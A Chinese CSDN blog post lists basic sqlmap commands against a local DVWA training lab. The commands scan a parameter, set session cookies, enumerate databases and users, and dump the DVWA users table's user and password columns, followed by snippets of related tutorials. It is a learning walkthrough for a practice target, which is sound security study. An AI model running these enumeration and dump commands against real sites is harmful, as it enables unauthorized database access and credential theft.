sqlmap的基本使用

最新推荐文章于 2024-04-12 03:17:21 发布
最新推荐文章于 2024-04-12 03:17:21 发布
阅读量379 收藏 1
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a69843251/article/details/88850300
版权

Sqlmap的使用

1、扫描地址:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2

2、忽略选项:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch

3、提升扫描等级:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch --level=5

4、提升风险等级:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch --level=5 --risk=3

5、指定参数:http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit&user_token=3727f8a70866e851a5b7c7cc5d734560# -p id

6、指定数据库:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2”--dbms=mysql

7、添加cookie sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1"

 

 

获取库

8、获得数据库名

 sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --dbs

  1. 获取当前数据库

 sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --current-db

  1. 获取所有用户名

 sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --users

  1. 获取当前用户名

 sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4" --batch--cookie=" security=low; PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" --current-user

  1. 获取指定库里的所有表

sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa --tables

  1. 查找指定表里的所有列

sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users --columns

  1. Dump的用法

sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users --columns --dump

 

sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=2c9ae8e24b0eec7d1ff6b80363825518#" -p id --batch --cookie="security=low;PHPSESSID=8pesrkar3h1oukf3s29f9bi9r1" -D dvwa -T users -C user,password --dump

 

 

 

a69843251
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入:Sql注入之sqlmapapi介绍
caoxinjian423的博客
03-07 1722
sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。sqlmap的开发者新加了sqlmapapi.py,可以直接通过接口调用来操作,简化了sqlmap命令执行方式。 sqlmap api分为服务端和客户端,sqlmap api有两种模式,一种是基于HTTP协议的接口模式,一种是基于命令行的接口模式。 sqlmap源码下载地址:htt...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1342
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
最新发布
2401_84182758的博客
04-12 841
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 1719
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
SQLMAP使用笔记.pdf
01-25
一、SQLMAP基本使用 SQLMAP基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
sqlmap使用手册
12-11
1. **安装与配置**: 首先,要在本地环境中安装SQLMap,了解基本的命令行选项和配置参数。 2. **理解注入类型**: 学习不同类型的SQL注入,如基于错误的注入、基于时间的注入、联合查询注入等。 3. **实战演练**: ...
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap使用手册集合
06-10
一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以执行多种操作,如数据泄露、数据库权限提升甚至...
SQLMAP的注入使用
05-13
SQLMAP的注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4687
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap基本使用方法
zjc的专栏
05-16 4529
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 基本语法 1.先进行注入点探测,常规语法是: python sqlmap.py –u [url] 说明:url 一般选择包括参数输入的链接。如果是get方法,就直接跟在url后面用?补充参数。如果是...
sqlmap基本使用说明
sopora的博客
10-09 585
sqlmap基本参数 ___ __H__ ___ ___[(]_____ ___ ___ {1.2.3#stable} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org Usage: python sqlmap [op...
SQLMap基本使用方法及简单介绍
weixin_45287663的博客
01-14 3942
SQLMap介绍 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定URL的SQL注入漏洞,SQLMap支持的数据库有MySQL、Oracle、Microsoft Access、PostgreSQL、Microsoft SQL Server、IBM DB2、SQLite、Sybase和Firebird等。SQLMap主要使用了以下五种SQL注入技术。 联合查询注入:在可以...
Sqlmap使用教程
B-Tree
02-24 3719
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
DVWA(靶机)-----sql注入简单利用笔记
边城浪子的博客
11-01 377
关于DVWA的介绍网上太多。 实验环境: windows2003服务器(192.168.152.128) DVWA源码包 攻击过程: step1:打开浏览器,设代理 ,Burpsuite设代理 。 step2:抓包如图,保存为sql_low.txt。 网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/ step3:使用sql...
sqlmap扫描命令
09-11
你可以使用以下命令来运行 sqlmap 进行扫描: ``` sqlmap -u <目标URL> [选项] ``` 其中 `<目标URL>` 是你要扫描的目标网站的URL。你还可以使用其他选项来定制扫描过程,例如: - `-p <参数>`:指定要测试的参数 - `--level=<等级>`:设置扫描的等级(1-5,默认为1) - `--risk=<风险>`:设置扫描的风险等级(1-3,默认为1) - `--dbms=<数据库>`:指定要测试的数据库类型 - `--cookie=<cookie>`:指定 cookie 值 - `--user-agent=<user-agent>`:设置 User-Agent 字符串 这只是一些常见的选项,你可以通过运行 `sqlmap --help` 来查看所有可用选项。请注意,在进行任何扫描之前,请确保你已经获得了合法的授权,以遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值